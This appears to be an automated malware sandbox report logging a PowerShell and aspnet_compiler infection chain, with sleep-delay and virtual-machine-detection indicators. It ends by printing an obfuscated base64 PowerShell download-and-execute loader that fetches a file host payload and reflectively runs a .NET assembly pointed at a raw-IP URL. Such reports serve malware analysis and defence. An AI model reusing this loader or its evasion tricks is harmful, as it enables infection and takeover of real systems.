Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5494	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4251	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8354	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1313	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1498	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4928	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4866	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3272	Thread sleep count: 8354 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3272	Thread sleep count: 1313 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1804	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1908	Thread sleep count: 1498 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1908	Thread sleep count: 299 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4592	Thread sleep count: 4928 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5440	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5744	Thread sleep count: 4866 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3096	Thread sleep time: -540000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

13_2_00403D74

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: wscript.exe, 00000006.00000002.1777797003.0000000005997000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o
Source: powershell.exe, 00000001.00000002.1836916318.0000000008634000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1833233000.000000000782E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000000.00000002.1704448215.0000000005709000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\G
Source: powershell.exe, 00000001.00000002.1833233000.000000000782E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWj
Source: powershell.exe, 00000009.00000002.2053858986.000000000A381000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 4'^qemU
Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000009.00000002.1993969365.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: aspnet_compiler.exe, 0000000D.00000002.2893956116.0000000001528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_0040317B mov eax, dword ptr fs:[00000030h]

13_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00402B7C GetProcessHeap,RtlAllocateHeap,

13_2_00402B7C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_5820.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = 